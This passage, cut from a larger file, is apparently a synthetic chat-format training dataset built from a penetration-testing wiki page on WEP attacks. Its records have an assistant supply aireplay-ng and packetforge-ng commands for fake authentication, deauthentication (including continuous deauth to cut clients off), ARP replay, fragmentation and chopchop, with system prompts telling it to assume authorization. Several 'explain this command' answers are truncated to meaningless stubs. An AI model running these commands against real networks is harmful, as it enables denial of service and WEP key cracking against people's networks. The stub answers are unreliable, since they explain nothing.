to try again with a RPi or something...\n\nDepending on the scenario, it is advisable to operate fake authentication regularly to keep the association state alive during long attacks. This can be achieved by setting the fakeauth delay to something like 60 (--fakeauth 60) and/or changing the delay between keep-alive packets (-q` option, set to 15 by default).", "metadata": {"corpus_index": 1659, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ WEP - Fake authentication"}, {"role": "assistant", "content": "When no clients are connected to the AP, or when the tester doesn't want to spoof a legitimate client's MAC address to inject frames, it is required to operate a fake authentication attack in order to associate the client with the AP. This can be done with aireplay-ng. In the following example, the authentication mode was set to OPEN on the access point. For SKA access points, aireplay-ng will print \"Switching to shared key authentication\" instead of \"Authentication successful\".\n\n``bash\naireplay-ng --fakeauth 0 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface\n`\n\n![](<./assets/fake authentication aireplay.png>){.rawimg}\n\nWhen the authentication mode in use is not OPEN, but rather SKA, the tester can either \n\n* spoof a legitimate client's MAC address when attacking with aireplay-ng with option -h.\n* wait for a legitimate client to connect to the AP (or force it), capture the authentication, have airodump-ng extract the keystream from it, and use it with a known-plaintext attack to bypass the SKA mode requirement (.i.e the need to know the secret key).\n\n> [!WARNING]\n> TODO : I've had issues with my AP, I need to try again with a RPi or something...\n\nDepending on the scenario, it is advisable to operate fake authentication regularly to keep the association state alive during long attacks. This can be achieved by setting the fakeauth delay to something like 60 (--fakeauth 60) and/or changing the delay between keep-alive packets (-q` option, set to 15 by default)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ WEP - Fake authentication", "response": "When no clients are connected to the AP, or when the tester doesn't want to spoof a legitimate client's MAC address to inject frames, it is required to operate a fake authentication attack in order to associate the client with the AP. This can be done with aireplay-ng. In the following example, the authentication mode was set to OPEN on the access point. For SKA access points, aireplay-ng will print \"Switching to shared key authentication\" instead of \"Authentication successful\".\n\n``bash\naireplay-ng --fakeauth 0 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface\n`\n\n![](<./assets/fake authentication aireplay.png>){.rawimg}\n\nWhen the authentication mode in use is not OPEN, but rather SKA, the tester can either \n\n* spoof a legitimate client's MAC address when attacking with aireplay-ng with option -h.\n* wait for a legitimate client to connect to the AP (or force it), capture the authentication, have airodump-ng extract the keystream from it, and use it with a known-plaintext attack to bypass the SKA mode requirement (.i.e the need to know the secret key).\n\n> [!WARNING]\n> TODO : I've had issues with my AP, I need to try again with a RPi or something...\n\nDepending on the scenario, it is advisable to operate fake authentication regularly to keep the association state alive during long attacks. This can be achieved by setting the fakeauth delay to something like 60 (--fakeauth 60) and/or changing the delay between keep-alive packets (-q` option, set to 15 by default).", "metadata": {"corpus_index": 1659, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the aireplay-ng command for 🛠️ wep - fake authentication"}, {"role": "assistant", "content": "aireplay-ng --fakeauth 0 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the aireplay-ng command for 🛠️ wep - fake authentication", "response": "aireplay-ng --fakeauth 0 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface", "metadata": {"corpus_index": 1660, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "aireplay-ng"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ WEP - Fake authentication"}, {"role": "assistant", "content": "aireplay-ng --fakeauth 0 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ WEP - Fake authentication", "response": "aireplay-ng --fakeauth 0 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface", "metadata": {"corpus_index": 1660, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `aireplay-ng --fakeauth 0 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface`?"}, {"role": "assistant", "content": "This command is used for 🛠️ wep - fake authentication. Fake authentication"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `aireplay-ng --fakeauth 0 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface`?", "response": "This command is used for 🛠️ wep - fake authentication. Fake authentication", "metadata": {"corpus_index": 1660, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 🛠️ WEP - De-authentication"}, {"role": "assistant", "content": "It is possible to send disassociation packets to clients connected to an access point. This works since 802.11 is a protocol where the source can be impersonated (spoofed access point MAC address), 802.11 is on the physical and data link layers of the OSI model. This will make the client try to re-authenticate to the target AP. In this attack, there is no need to spoof legitimate clients since the impersonated source is the access point itself and the destination is broadcast.\n\n``bash\naireplay-ng --deauth 10 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface\n`\n\n![](<./assets/deauth aireplay.png>){.rawimg}\n\n> [!TIP]\n> This attack is more effective when targeting a specific connected client withe the -c option, and in order to work, the attacker needs to be close to that client since the frames will be sent from his machine to the client directly.\n\nThis attack can be used continuously to prevent the client(s) from accessing the access point by setting the delay to 0 (--deauth 0`)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 🛠️ WEP - De-authentication", "response": "It is possible to send disassociation packets to clients connected to an access point. This works since 802.11 is a protocol where the source can be impersonated (spoofed access point MAC address), 802.11 is on the physical and data link layers of the OSI model. This will make the client try to re-authenticate to the target AP. In this attack, there is no need to spoof legitimate clients since the impersonated source is the access point itself and the destination is broadcast.\n\n``bash\naireplay-ng --deauth 10 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface\n`\n\n![](<./assets/deauth aireplay.png>){.rawimg}\n\n> [!TIP]\n> This attack is more effective when targeting a specific connected client withe the -c option, and in order to work, the attacker needs to be close to that client since the frames will be sent from his machine to the client directly.\n\nThis attack can be used continuously to prevent the client(s) from accessing the access point by setting the delay to 0 (--deauth 0`).", "metadata": {"corpus_index": 1661, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ WEP - De-authentication"}, {"role": "assistant", "content": "It is possible to send disassociation packets to clients connected to an access point. This works since 802.11 is a protocol where the source can be impersonated (spoofed access point MAC address), 802.11 is on the physical and data link layers of the OSI model. This will make the client try to re-authenticate to the target AP. In this attack, there is no need to spoof legitimate clients since the impersonated source is the access point itself and the destination is broadcast.\n\n``bash\naireplay-ng --deauth 10 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface\n`\n\n![](<./assets/deauth aireplay.png>){.rawimg}\n\n> [!TIP]\n> This attack is more effective when targeting a specific connected client withe the -c option, and in order to work, the attacker needs to be close to that client since the frames will be sent from his machine to the client directly.\n\nThis attack can be used continuously to prevent the client(s) from accessing the access point by setting the delay to 0 (--deauth 0`)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ WEP - De-authentication", "response": "It is possible to send disassociation packets to clients connected to an access point. This works since 802.11 is a protocol where the source can be impersonated (spoofed access point MAC address), 802.11 is on the physical and data link layers of the OSI model. This will make the client try to re-authenticate to the target AP. In this attack, there is no need to spoof legitimate clients since the impersonated source is the access point itself and the destination is broadcast.\n\n``bash\naireplay-ng --deauth 10 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface\n`\n\n![](<./assets/deauth aireplay.png>){.rawimg}\n\n> [!TIP]\n> This attack is more effective when targeting a specific connected client withe the -c option, and in order to work, the attacker needs to be close to that client since the frames will be sent from his machine to the client directly.\n\nThis attack can be used continuously to prevent the client(s) from accessing the access point by setting the delay to 0 (--deauth 0`).", "metadata": {"corpus_index": 1661, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use aireplay-ng for 🛠️ wep - de-authentication?"}, {"role": "assistant", "content": "aireplay-ng --deauth 10 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use aireplay-ng for 🛠️ wep - de-authentication?", "response": "aireplay-ng --deauth 10 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface", "metadata": {"corpus_index": 1662, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "aireplay-ng"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ WEP - De-authentication?"}, {"role": "assistant", "content": "aireplay-ng --deauth 10 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ WEP - De-authentication?", "response": "aireplay-ng --deauth 10 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface", "metadata": {"corpus_index": 1662, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `aireplay-ng --deauth 10 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface`?"}, {"role": "assistant", "content": "This command is used for 🛠️ wep - de-authentication. De-authentication"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `aireplay-ng --deauth 10 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface`?", "response": "This command is used for 🛠️ wep - de-authentication. De-authentication", "metadata": {"corpus_index": 1662, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ WEP - ARP replay work?"}, {"role": "assistant", "content": "> [!TIP]\n> Tips and requirements\n> \n> * An associated state is needed. Testers can either run a fake authentication attack or spoof a legitimate client's MAC address with the -h option on aireplay-ng.\n> * Connected clients are needed.\n> \n> In order to make that operation more effective, it is possible to combine the ARP replay technique with a de-authentication attack.\n\nThe \"ARP replay\" mode of aireplay-ng can be used to gather new IVs by listening to ARP packets and resending them to the AP. The data will be captured by airodump-ng and saved in a capture file with the name supplied on the --write argument.\n\n> The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably. The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IVs. It is all these new IVs which allow you to determine the WEP key. (source)\n\n``bash\naireplay-ng --arpreplay -b 'TA:RG:ET:BS:SI:DD' $wlan_interface\n``\n\n![](<./assets/ARP replay aireplay.png>){.rawimg}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ WEP - ARP replay work?", "response": "> [!TIP]\n> Tips and requirements\n> \n> * An associated state is needed. Testers can either run a fake authentication attack or spoof a legitimate client's MAC address with the -h option on aireplay-ng.\n> * Connected clients are needed.\n> \n> In order to make that operation more effective, it is possible to combine the ARP replay technique with a de-authentication attack.\n\nThe \"ARP replay\" mode of aireplay-ng can be used to gather new IVs by listening to ARP packets and resending them to the AP. The data will be captured by airodump-ng and saved in a capture file with the name supplied on the --write argument.\n\n> The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably. The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IVs. It is all these new IVs which allow you to determine the WEP key. (source)\n\n``bash\naireplay-ng --arpreplay -b 'TA:RG:ET:BS:SI:DD' $wlan_interface\n``\n\n![](<./assets/ARP replay aireplay.png>){.rawimg}", "metadata": {"corpus_index": 1663, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ WEP - ARP replay"}, {"role": "assistant", "content": "> [!TIP]\n> Tips and requirements\n> \n> * An associated state is needed. Testers can either run a fake authentication attack or spoof a legitimate client's MAC address with the -h option on aireplay-ng.\n> * Connected clients are needed.\n> \n> In order to make that operation more effective, it is possible to combine the ARP replay technique with a de-authentication attack.\n\nThe \"ARP replay\" mode of aireplay-ng can be used to gather new IVs by listening to ARP packets and resending them to the AP. The data will be captured by airodump-ng and saved in a capture file with the name supplied on the --write argument.\n\n> The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably. The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IVs. It is all these new IVs which allow you to determine the WEP key. (source)\n\n``bash\naireplay-ng --arpreplay -b 'TA:RG:ET:BS:SI:DD' $wlan_interface\n``\n\n![](<./assets/ARP replay aireplay.png>){.rawimg}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ WEP - ARP replay", "response": "> [!TIP]\n> Tips and requirements\n> \n> * An associated state is needed. Testers can either run a fake authentication attack or spoof a legitimate client's MAC address with the -h option on aireplay-ng.\n> * Connected clients are needed.\n> \n> In order to make that operation more effective, it is possible to combine the ARP replay technique with a de-authentication attack.\n\nThe \"ARP replay\" mode of aireplay-ng can be used to gather new IVs by listening to ARP packets and resending them to the AP. The data will be captured by airodump-ng and saved in a capture file with the name supplied on the --write argument.\n\n> The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably. The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IVs. It is all these new IVs which allow you to determine the WEP key. (source)\n\n``bash\naireplay-ng --arpreplay -b 'TA:RG:ET:BS:SI:DD' $wlan_interface\n``\n\n![](<./assets/ARP replay aireplay.png>){.rawimg}", "metadata": {"corpus_index": 1663, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the aireplay-ng syntax for 🛠️ wep - arp replay?"}, {"role": "assistant", "content": "aireplay-ng --arpreplay -b 'TA:RG:ET:BS:SI:DD' $wlan_interface"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the aireplay-ng syntax for 🛠️ wep - arp replay?", "response": "aireplay-ng --arpreplay -b 'TA:RG:ET:BS:SI:DD' $wlan_interface", "metadata": {"corpus_index": 1664, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "aireplay-ng"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ WEP - ARP replay"}, {"role": "assistant", "content": "aireplay-ng --arpreplay -b 'TA:RG:ET:BS:SI:DD' $wlan_interface"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ WEP - ARP replay", "response": "aireplay-ng --arpreplay -b 'TA:RG:ET:BS:SI:DD' $wlan_interface", "metadata": {"corpus_index": 1664, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `aireplay-ng --arpreplay -b 'TA:RG:ET:BS:SI:DD' $wlan_interface`?"}, {"role": "assistant", "content": "This command is used for 🛠️ wep - arp replay. ARP replay"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `aireplay-ng --arpreplay -b 'TA:RG:ET:BS:SI:DD' $wlan_interface`?", "response": "This command is used for 🛠️ wep - arp replay. ARP replay", "metadata": {"corpus_index": 1664, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the aireplay-ng syntax for 🛠️ wep - fragmentation?"}, {"role": "assistant", "content": "aireplay-ng --fragment -F -b 'TA:RG:ET:BS:SI:DD' $wlan_interface"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the aireplay-ng syntax for 🛠️ wep - fragmentation?", "response": "aireplay-ng --fragment -F -b 'TA:RG:ET:BS:SI:DD' $wlan_interface", "metadata": {"corpus_index": 1665, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "aireplay-ng"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ WEP - Fragmentation"}, {"role": "assistant", "content": "aireplay-ng --fragment -F -b 'TA:RG:ET:BS:SI:DD' $wlan_interface"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ WEP - Fragmentation", "response": "aireplay-ng --fragment -F -b 'TA:RG:ET:BS:SI:DD' $wlan_interface", "metadata": {"corpus_index": 1665, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `aireplay-ng --fragment -F -b 'TA:RG:ET:BS:SI:DD' $wlan_interface`?"}, {"role": "assistant", "content": "This command is used for 🛠️ wep - fragmentation. Fragmentation"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `aireplay-ng --fragment -F -b 'TA:RG:ET:BS:SI:DD' $wlan_interface`?", "response": "This command is used for 🛠️ wep - fragmentation. Fragmentation", "metadata": {"corpus_index": 1665, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the packetforge-ng command to 🛠️ wep - fragmentation"}, {"role": "assistant", "content": "packetforge-ng --arp -a 'TA:RG:ET:BS:SI:DD' -h 'CL:IE:NT:BS:SI:DD' -k 255.255.255.255 -l 255.255.255.255 -y $fragment_file -w crafted-packet"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the packetforge-ng command to 🛠️ wep - fragmentation", "response": "packetforge-ng --arp -a 'TA:RG:ET:BS:SI:DD' -h 'CL:IE:NT:BS:SI:DD' -k 255.255.255.255 -l 255.255.255.255 -y $fragment_file -w crafted-packet", "metadata": {"corpus_index": 1666, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "packetforge-ng"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ WEP - Fragmentation during a pentest?"}, {"role": "assistant", "content": "packetforge-ng --arp -a 'TA:RG:ET:BS:SI:DD' -h 'CL:IE:NT:BS:SI:DD' -k 255.255.255.255 -l 255.255.255.255 -y $fragment_file -w crafted-packet"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ WEP - Fragmentation during a pentest?", "response": "packetforge-ng --arp -a 'TA:RG:ET:BS:SI:DD' -h 'CL:IE:NT:BS:SI:DD' -k 255.255.255.255 -l 255.255.255.255 -y $fragment_file -w crafted-packet", "metadata": {"corpus_index": 1666, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `packetforge-ng --arp -a 'TA:RG:ET:BS:SI:DD' -h 'CL:IE:NT:BS:SI:DD' -k 255.255.255.255 -l 255.255.255.255 -y $fragment_file -w crafted-packet`?"}, {"role": "assistant", "content": "This command is used for 🛠️ wep - fragmentation. Fragmentation"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `packetforge-ng --arp -a 'TA:RG:ET:BS:SI:DD' -h 'CL:IE:NT:BS:SI:DD' -k 255.255.255.255 -l 255.255.255.255 -y $fragment_file -w crafted-packet`?", "response": "This command is used for 🛠️ wep - fragmentation. Fragmentation", "metadata": {"corpus_index": 1666, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the aireplay-ng syntax for 🛠️ wep - fragmentation?"}, {"role": "assistant", "content": "aireplay-ng --interactive -F -r crafted-packet $wlan_interface"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the aireplay-ng syntax for 🛠️ wep - fragmentation?", "response": "aireplay-ng --interactive -F -r crafted-packet $wlan_interface", "metadata": {"corpus_index": 1667, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "aireplay-ng"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ WEP - Fragmentation?"}, {"role": "assistant", "content": "aireplay-ng --interactive -F -r crafted-packet $wlan_interface"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ WEP - Fragmentation?", "response": "aireplay-ng --interactive -F -r crafted-packet $wlan_interface", "metadata": {"corpus_index": 1667, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `aireplay-ng --interactive -F -r crafted-packet $wlan_interface`?"}, {"role": "assistant", "content": "This command is used for 🛠️ wep - fragmentation. Fragmentation"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `aireplay-ng --interactive -F -r crafted-packet $wlan_interface`?", "response": "This command is used for 🛠️ wep - fragmentation. Fragmentation", "metadata": {"corpus_index": 1667, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the aireplay-ng command to 🛠️ wep - chopchop"}, {"role": "assistant", "content": "aireplay-ng --chopchop -F -b 'TA:RG:ET:BS:SI:DD' -h 'CL:IE:NT:BS:SI:DD' $wlan_interface"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the aireplay-ng command to 🛠️ wep - chopchop", "response": "aireplay-ng --chopchop -F -b 'TA:RG:ET:BS:SI:DD' -h 'CL:IE:NT:BS:SI:DD' $wlan_interface", "metadata": {"corpus_index": 1668, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "aireplay-ng"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing 